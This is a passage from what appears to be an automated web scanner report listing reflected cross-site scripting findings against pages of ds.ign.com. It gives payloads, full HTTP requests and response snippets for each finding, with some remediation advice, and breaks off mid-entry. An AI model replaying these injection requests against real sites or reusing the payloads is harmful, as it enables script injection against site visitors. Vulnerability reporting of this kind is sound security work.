<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Nintendo DS - DS & ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/?f985c"-alert(1)-"350b28818c2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccb3"><script>alert(1)</script>fd8eba6ee0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9ccb3"><script>alert(1)</script>fd8eba6ee0e=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/articles/114/1144790p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fee"><script>alert(1)</script>feb0c62afa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1144790p1.html?b2fee"><script>alert(1)</script>feb0c62afa1=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/articles/114/1144790p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615b0"-alert(1)-"70bd57fc703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/articles/114/1147000p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf59c"><script>alert(1)</script>f12d6b81cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147000p1.html?cf59c"><script>alert(1)</script>f12d6b81cd4=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/articles/114/1147000p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1599"-alert(1)-"883c8f7eb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a750a"><script>alert(1)</script>0b52f57593c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/features.html?a750a"><script>alert(1)</script>0b52f57593c=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a51fa"-alert(1)-"eea0e1cc2a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Nintendo DS & DSi ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abbe6"-alert(1)-"60b113bb3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/games.html?abbe6"-alert(1)-"60b113bb3a0=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All Nintendo DS & ...[SNIP]... f(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/games.html?abbe6"-alert(1)-"60b113bb3a0=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd18"><script>alert(1)</script>8dcff63431b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All Nintendo DS & ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e43"><script>alert(1)</script>9a1b0f2269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84e66"-alert(1)-"8a875710ab2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/images.html?84e66"-alert(1)-"8a875710ab2=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/images.html?84e66"-alert(1)-"8a875710ab2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a6fd"-alert(1)-"011aedbdd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"><script>alert(1)</script>a7609ad19bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?92f97"><script>alert(1)</script>a7609ad19bc=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ad3"><script>alert(1)</script>66fd0e3ba98 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?types=all15ad3"><script>alert(1)</script>66fd0e3ba98 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a11"-alert(1)-"885b288a082 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?types=all89a11"-alert(1)-"885b288a082 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into an HTML comment. The payload 22b01--><script>alert(1)</script>4e06c977745 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/latest-updates.html?types=all22b01--><script>alert(1)</script>4e06c977745 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <!-- http://content-api.ign.com/v1/articles.xml.us?max=250&channelId=532&types=all22b01--><script>alert(1)</script>4e06c977745&startDate=20110107&endDate=20110206 --> ...[SNIP]...
1.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a58"-alert(1)-"739a0385749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?b8a58"-alert(1)-"739a0385749=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/news.html?b8a58"-alert(1)-"739a0385749=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c65"><script>alert(1)</script>bad51faa319 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ea7"><script>alert(1)</script>66a0bffc619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddc6"-alert(1)-"91790f839c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/previews.html?bddc6"-alert(1)-"91790f839c5=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/previews.html?bddc6"-alert(1)-"91790f839c5=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52616"-alert(1)-"17261e88bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?52616"-alert(1)-"17261e88bc1=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New Nintendo DS & ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/reviews.html?52616"-alert(1)-"17261e88bc1=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64e7"><script>alert(1)</script>8545307439b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New Nintendo DS & ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef322"><script>alert(1)</script>9008801a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New Nintendo DS & ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a4e"-alert(1)-"0edb7c69d16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New Nintendo DS & ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ds.ign.com/index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8eb3"><script>alert(1)</script>721f950aac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1 HTTP/1.1 Host: ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN DS: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ds.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c60d1"-alert(1)-"123e4cb45b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
